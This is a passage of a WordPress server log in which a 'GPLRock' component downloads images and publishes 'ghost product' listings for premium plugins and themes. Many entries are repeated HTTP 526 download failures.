pre-downloaded image for product yith-woocommerce-review-reminder-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9db7f648.jpg [05-Apr-2026 04:26:20 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-review-reminder-premium [05-Apr-2026 04:26:22 UTC] GPLRock: Image downloaded successfully for product ads-pro-plugin-multi-purpose-wordpress-advertising-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93d8dd2d.avif [05-Apr-2026 04:26:22 UTC] GPLRock: Using pre-downloaded image for product ads-pro-plugin-multi-purpose-wordpress-advertising-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93d8dd2d.avif [05-Apr-2026 04:26:22 UTC] GPLRock: Ghost product published with image - Product ID: ads-pro-plugin-multi-purpose-wordpress-advertising-manager [05-Apr-2026 04:26:23 UTC] GPLRock: Image downloaded successfully for product real-estate-pro-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94cc852f.jpg [05-Apr-2026 04:26:23 UTC] GPLRock: Using pre-downloaded image for product real-estate-pro-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94cc852f.jpg [05-Apr-2026 04:26:23 UTC] GPLRock: Ghost product published with image - Product ID: real-estate-pro-wordpress-plugin [05-Apr-2026 04:26:25 UTC] GPLRock: Image downloaded successfully for product videopro-video-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b71554c.jpg [05-Apr-2026 04:26:25 UTC] GPLRock: Using pre-downloaded image for product videopro-video-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b71554c.jpg [05-Apr-2026 04:26:25 UTC] GPLRock: Ghost product published with image - Product ID: videopro-video-wordpress-theme [05-Apr-2026 04:26:26 UTC] GPLRock: Image downloaded successfully for product university-education-event-and-course-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cfd48f4.jpg [05-Apr-2026 04:26:27 UTC] GPLRock: Using pre-downloaded image for product university-education-event-and-course-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cfd48f4.jpg [05-Apr-2026 04:26:27 UTC] GPLRock: Ghost product published with image - Product ID: university-education-event-and-course-theme [05-Apr-2026 04:26:28 UTC] GPLRock: Image downloaded successfully for product themeisle-feedzy-rss-feeds-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5aab0b31.jpg [05-Apr-2026 04:26:28 UTC] GPLRock: Using pre-downloaded image for product themeisle-feedzy-rss-feeds-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5aab0b31.jpg [05-Apr-2026 04:26:28 UTC] GPLRock: Ghost product published with image - Product ID: themeisle-feedzy-rss-feeds-premium [05-Apr-2026 04:26:30 UTC] GPLRock: Image downloaded successfully for product wpdatatables-tables-and-charts-manager-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f5f7f01.jpg [05-Apr-2026 04:26:30 UTC] GPLRock: Using pre-downloaded image for product wpdatatables-tables-and-charts-manager-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f5f7f01.jpg [05-Apr-2026 04:26:30 UTC] GPLRock: Ghost product published with image - Product ID: wpdatatables-tables-and-charts-manager-for-wordpress [05-Apr-2026 04:26:32 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-pdf-invoice-and-shipping-list-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-758baa17.jpg [05-Apr-2026 04:26:32 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-pdf-invoice-and-shipping-list-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-758baa17.jpg [05-Apr-2026 04:26:32 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-pdf-invoice-and-shipping-list-premium [05-Apr-2026 04:27:18 UTC] GPLRock: Image downloaded successfully for product aleos-business-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ecfae23.webp [05-Apr-2026 04:27:18 UTC] GPLRock: Using pre-downloaded image for product aleos-business-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ecfae23.webp [05-Apr-2026 04:27:18 UTC] GPLRock: Ghost product published with image - Product ID: aleos-business-agency-elementor-template-kit [05-Apr-2026 04:27:20 UTC] GPLRock: Image downloaded successfully for product alcor-dark-real-estate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ed2f36d.jpg [05-Apr-2026 04:27:20 UTC] GPLRock: Using pre-downloaded image for product alcor-dark-real-estate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ed2f36d.jpg [05-Apr-2026 04:27:20 UTC] GPLRock: Ghost product published with image - Product ID: alcor-dark-real-estate-elementor-template-kit [05-Apr-2026 04:27:21 UTC] GPLRock: Image downloaded successfully for product alaya-coworking-space-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ad9b805.webp [05-Apr-2026 04:27:21 UTC] GPLRock: Using pre-downloaded image for product alaya-coworking-space-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ad9b805.webp [05-Apr-2026 04:27:21 UTC] GPLRock: Ghost product published with image - Product ID: alaya-coworking-space-elementor-template-kit [05-Apr-2026 04:27:23 UTC] GPLRock: Image downloaded successfully for product alasia-model-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-28120621.jpg [05-Apr-2026 04:27:23 UTC] GPLRock: Using pre-downloaded image for product alasia-model-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-28120621.jpg [05-Apr-2026 04:27:23 UTC] GPLRock: Ghost product published with image - Product ID: alasia-model-agency-elementor-template-kit [05-Apr-2026 04:27:25 UTC] GPLRock: Image downloaded successfully for product alarmax-security-services-alarm-installation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8622872a.webp [05-Apr-2026 04:27:25 UTC] GPLRock: Using pre-downloaded image for product alarmax-security-services-alarm-installation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8622872a.webp [05-Apr-2026 04:27:25 UTC] GPLRock: Ghost product published with image - Product ID: alarmax-security-services-alarm-installation-elementor-template-kit [05-Apr-2026 04:27:26 UTC] GPLRock: Image downloaded successfully for product aksa-yoga-teacher-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27021c03.webp [05-Apr-2026 04:27:26 UTC] GPLRock: Using pre-downloaded image for product aksa-yoga-teacher-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27021c03.webp [05-Apr-2026 04:27:26 UTC] GPLRock: Ghost product published with image - Product ID: aksa-yoga-teacher-studio-elementor-template-kit [05-Apr-2026 04:27:27 UTC] GPLRock: Image downloaded successfully for product akamsi-personal-influencer-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6d685b26.webp [05-Apr-2026 04:27:28 UTC] GPLRock: Using pre-downloaded image for product akamsi-personal-influencer-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6d685b26.webp [05-Apr-2026 04:27:28 UTC] GPLRock: Ghost product published with image - Product ID: akamsi-personal-influencer-elementor-template-kit [05-Apr-2026 04:27:29 UTC] GPLRock: Image downloaded successfully for product ahency-creative-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f20eddb7.webp [05-Apr-2026 04:27:29 UTC] GPLRock: Using pre-downloaded image for product ahency-creative-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f20eddb7.webp [05-Apr-2026 04:27:29 UTC] GPLRock: Ghost product published with image - Product ID: ahency-creative-digital-agency-elementor-template-kit [05-Apr-2026 04:27:31 UTC] GPLRock: Image downloaded successfully for product agrool-agriculture-farming-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bdb18803.webp [05-Apr-2026 04:27:31 UTC] GPLRock: Using pre-downloaded image for product agrool-agriculture-farming-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bdb18803.webp [05-Apr-2026 04:27:31 UTC] GPLRock: Ghost product published with image - Product ID: agrool-agriculture-farming-elementor-template-kit [05-Apr-2026 04:27:32 UTC] GPLRock: Image downloaded successfully for product agetha-creative-portfolio-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a8064e71.webp [05-Apr-2026 04:27:32 UTC] GPLRock: Using pre-downloaded image for product agetha-creative-portfolio-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a8064e71.webp [05-Apr-2026 04:27:32 UTC] GPLRock: Ghost product published with image - Product ID: agetha-creative-portfolio-template-kit [05-Apr-2026 04:28:19 UTC] GPLRock: Image download failed for product shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:21 UTC] GPLRock: Image download failed for product shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shout---html5-radio-player-with-ads---shoutcast-and-icecast-support---wordpress--12303.webp for product shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:28:24 UTC] GPLRock: Image download failed for product shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:26 UTC] GPLRock: Image download failed for product shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shout---html5-radio-player-with-ads---shoutcast-and-icecast-support---wordpress--12303.webp for product shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:28:28 UTC] GPLRock WARNING: Image download failed for product shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/shout---html5-radio-player-with-ads---shoutcast-and-icecast-support---wordpress--12303.webp [05-Apr-2026 04:28:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin [05-Apr-2026 04:28:28 UTC] GPLRock: Image downloaded successfully for product vg-postslider-post-slider-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9f5bd693.webp [05-Apr-2026 04:28:28 UTC] GPLRock: Using pre-downloaded image for product vg-postslider-post-slider-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9f5bd693.webp [05-Apr-2026 04:28:28 UTC] GPLRock: Ghost product published with image - Product ID: vg-postslider-post-slider-for-wordpress [05-Apr-2026 04:28:28 UTC] GPLRock: Image download failed for product agile-scrum-project-issue-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:30 UTC] GPLRock: Image download failed for product agile-scrum-project-issue-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agile-scrum---project-issue-management-28932.webp for product agile-scrum-project-issue-management after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:28:32 UTC] GPLRock: Image download failed for product agile-scrum-project-issue-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:34 UTC] GPLRock: Image download failed for product agile-scrum-project-issue-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agile-scrum---project-issue-management-28932.webp for product agile-scrum-project-issue-management after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:28:37 UTC] GPLRock WARNING: Image download failed for product agile-scrum-project-issue-management. URL: https://meldwp.com/wp-content/uploads/agile-scrum---project-issue-management-28932.webp [05-Apr-2026 04:28:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agile-scrum-project-issue-management [05-Apr-2026 04:28:37 UTC] GPLRock: Image downloaded successfully for product woocommerce-product-keyword-suggest (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-026a5fc6.webp [05-Apr-2026 04:28:37 UTC] GPLRock: Using pre-downloaded image for product woocommerce-product-keyword-suggest: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-026a5fc6.webp [05-Apr-2026 04:28:37 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-product-keyword-suggest [05-Apr-2026 04:28:37 UTC] GPLRock: Image download failed for product slider-hero (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:39 UTC] GPLRock: Image download failed for product slider-hero (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/slider-hero-30265.webp for product slider-hero after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:28:41 UTC] GPLRock: Image download failed for product slider-hero (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:43 UTC] GPLRock: Image download failed for product slider-hero (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/slider-hero-30265.webp for product slider-hero after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:28:45 UTC] GPLRock WARNING: Image download failed for product slider-hero. URL: https://meldwp.com/wp-content/uploads/slider-hero-30265.webp [05-Apr-2026 04:28:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: slider-hero [05-Apr-2026 04:28:45 UTC] GPLRock: Image download failed for product visual-composer-background-liquid-effects (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:48 UTC] GPLRock: Image download failed for product visual-composer-background-liquid-effects (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---background-liquid-effects-11807.webp for product visual-composer-background-liquid-effects after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:28:50 UTC] GPLRock: Image download failed for product visual-composer-background-liquid-effects (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:52 UTC] GPLRock: Image download failed for product visual-composer-background-liquid-effects (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---background-liquid-effects-11807.webp for product visual-composer-background-liquid-effects after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:28:54 UTC] GPLRock WARNING: Image download failed for product visual-composer-background-liquid-effects. URL: https://meldwp.com/wp-content/uploads/visual-composer---background-liquid-effects-11807.webp [05-Apr-2026 04:28:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: visual-composer-background-liquid-effects [05-Apr-2026 04:28:54 UTC] GPLRock: Image download failed for product 6cash-digital-wallet-mobile-app-with-laravel-admin-panel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:56 UTC] GPLRock: Image download failed for product 6cash-digital-wallet-mobile-app-with-laravel-admin-panel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:28:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/6cash---digital-wallet-mobile-app-with-laravel-admin-panel-22767.webp for product 6cash-digital-wallet-mobile-app-with-laravel-admin-panel after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:28:58 UTC] GPLRock: Image download failed for product 6cash-digital-wallet-mobile-app-with-laravel-admin-panel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:29:01 UTC] GPLRock: Image download failed for product 6cash-digital-wallet-mobile-app-with-laravel-admin-panel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:29:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/6cash---digital-wallet-mobile-app-with-laravel-admin-panel-22767.webp for product 6cash-digital-wallet-mobile-app-with-laravel-admin-panel after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:29:03 UTC] GPLRock WARNING: Image download failed for product 6cash-digital-wallet-mobile-app-with-laravel-admin-panel. URL: https://meldwp.com/wp-content/uploads/6cash---digital-wallet-mobile-app-with-laravel-admin-panel-22767.webp [05-Apr-2026 04:29:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 6cash-digital-wallet-mobile-app-with-laravel-admin-panel [05-Apr-2026 04:29:03 UTC] GPLRock: Image download failed for product woocommerce-binary-multi-level-marketing-mlm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:29:05 UTC] GPLRock: Image download failed for product woocommerce-binary-multi-level-marketing-mlm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:29:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-binary-multi-level-marketing-mlm-11351.webp for product woocommerce-binary-multi-level-marketing-mlm after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:29:07 UTC] GPLRock: Image download failed for product woocommerce-binary-multi-level-marketing-mlm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:29:09 UTC] GPLRock: Image download failed for product woocommerce-binary-multi-level-marketing-mlm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:29:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-binary-multi-level-marketing-mlm-11351.webp for product woocommerce-binary-multi-level-marketing-mlm after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:29:11 UTC] GPLRock WARNING: Image download failed for product woocommerce-binary-multi-level-marketing-mlm. URL: https://meldwp.com/wp-content/uploads/woocommerce-binary-multi-level-marketing-mlm-11351.webp [05-Apr-2026 04:29:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-binary-multi-level-marketing-mlm [05-Apr-2026 04:29:12 UTC] GPLRock: Image downloaded successfully for product modern-html5-responsive-youtube-playlist-player (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec6b8087.webp [05-Apr-2026 04:29:12 UTC] GPLRock: Using pre-downloaded image for product modern-html5-responsive-youtube-playlist-player: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec6b8087.webp [05-Apr-2026 04:29:12 UTC] GPLRock: Ghost product published with image - Product ID: modern-html5-responsive-youtube-playlist-player [05-Apr-2026 04:29:12 UTC] GPLRock: Image download failed for product minimal-audio-plugin-wpbakery-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:29:15 UTC] GPLRock: Image download failed for product minimal-audio-plugin-wpbakery-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:29:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minimal-audio-plugin-wpbakery-addon-11355.webp for product minimal-audio-plugin-wpbakery-addon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:29:17 UTC] GPLRock: Image download failed for product minimal-audio-plugin-wpbakery-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:29:19 UTC] GPLRock: Image download failed for product minimal-audio-plugin-wpbakery-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:29:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minimal-audio-plugin-wpbakery-addon-11355.webp for product minimal-audio-plugin-wpbakery-addon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:29:21 UTC] GPLRock WARNING: Image download failed for product minimal-audio-plugin-wpbakery-addon. URL: https://meldwp.com/wp-content/uploads/minimal-audio-plugin-wpbakery-addon-11355.webp [05-Apr-2026 04:29:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: minimal-audio-plugin-wpbakery-addon [05-Apr-2026 04:30:42 UTC] GPLRock: Image download failed for product biotellus-solar-and-renewable-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:30:45 UTC] GPLRock: Image download failed for product biotellus-solar-and-renewable-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:30:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/biotellus---solar-and-renewable-energy-wordpress-theme-20757.webp for product biotellus-solar-and-renewable-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:30:47 UTC] GPLRock: Image download failed for product biotellus-solar-and-renewable-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:30:49 UTC] GPLRock: Image download failed for product biotellus-solar-and-renewable-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:30:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/biotellus---solar-and-renewable-energy-wordpress-theme-20757.webp for product biotellus-solar-and-renewable-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:30:51 UTC] GPLRock WARNING: Image download failed for product biotellus-solar-and-renewable-energy-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/biotellus---solar-and-renewable-energy-wordpress-theme-20757.webp [05-Apr-2026 04:30:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: biotellus-solar-and-renewable-energy-wordpress-theme [05-Apr-2026 04:30:51 UTC] GPLRock: Image download failed for product qomfort-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:30:53 UTC] GPLRock: Image download failed for product qomfort-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:30:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qomfort---hotel-booking-wordpress-theme-3380.webp for product qomfort-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:30:55 UTC] GPLRock: Image download failed for product qomfort-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:30:57 UTC] GPLRock: Image download failed for product qomfort-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qomfort---hotel-booking-wordpress-theme-3380.webp for product qomfort-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:00 UTC] GPLRock WARNING: Image download failed for product qomfort-hotel-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/qomfort---hotel-booking-wordpress-theme-3380.webp [05-Apr-2026 04:31:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: qomfort-hotel-booking-wordpress-theme [05-Apr-2026 04:31:00 UTC] GPLRock: Image download failed for product kleo-community-focused-multi-purpose-buddypress-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:02 UTC] GPLRock: Image download failed for product kleo-community-focused-multi-purpose-buddypress-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kleo---community-focused--multi-purpose-buddypress-wordpress-theme-9639.webp for product kleo-community-focused-multi-purpose-buddypress-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:04 UTC] GPLRock: Image download failed for product kleo-community-focused-multi-purpose-buddypress-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:06 UTC] GPLRock: Image download failed for product kleo-community-focused-multi-purpose-buddypress-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kleo---community-focused--multi-purpose-buddypress-wordpress-theme-9639.webp for product kleo-community-focused-multi-purpose-buddypress-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:08 UTC] GPLRock WARNING: Image download failed for product kleo-community-focused-multi-purpose-buddypress-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kleo---community-focused--multi-purpose-buddypress-wordpress-theme-9639.webp [05-Apr-2026 04:31:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kleo-community-focused-multi-purpose-buddypress-wordpress-theme [05-Apr-2026 04:31:08 UTC] GPLRock: Image download failed for product cannamed-cannabis-marijuana-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:10 UTC] GPLRock: Image download failed for product cannamed-cannabis-marijuana-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cannamed---cannabis--marijuana-wordpress-32169.webp for product cannamed-cannabis-marijuana-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:13 UTC] GPLRock: Image download failed for product cannamed-cannabis-marijuana-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:15 UTC] GPLRock: Image download failed for product cannamed-cannabis-marijuana-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cannamed---cannabis--marijuana-wordpress-32169.webp for product cannamed-cannabis-marijuana-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:17 UTC] GPLRock WARNING: Image download failed for product cannamed-cannabis-marijuana-wordpress. URL: https://meldwp.com/wp-content/uploads/cannamed---cannabis--marijuana-wordpress-32169.webp [05-Apr-2026 04:31:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cannamed-cannabis-marijuana-wordpress [05-Apr-2026 04:31:17 UTC] GPLRock: Image download failed for product blackfyre-create-your-own-gaming-community (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:19 UTC] GPLRock: Image download failed for product blackfyre-create-your-own-gaming-community (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blackfyre---create-your-own-gaming-community-1108.webp for product blackfyre-create-your-own-gaming-community after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:21 UTC] GPLRock: Image download failed for product blackfyre-create-your-own-gaming-community (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:23 UTC] GPLRock: Image download failed for product blackfyre-create-your-own-gaming-community (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blackfyre---create-your-own-gaming-community-1108.webp for product blackfyre-create-your-own-gaming-community after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:25 UTC] GPLRock WARNING: Image download failed for product blackfyre-create-your-own-gaming-community. URL: https://meldwp.com/wp-content/uploads/blackfyre---create-your-own-gaming-community-1108.webp [05-Apr-2026 04:31:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blackfyre-create-your-own-gaming-community [05-Apr-2026 04:31:26 UTC] GPLRock: Image download failed for product dynamic-finance-and-consulting-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:28 UTC] GPLRock: 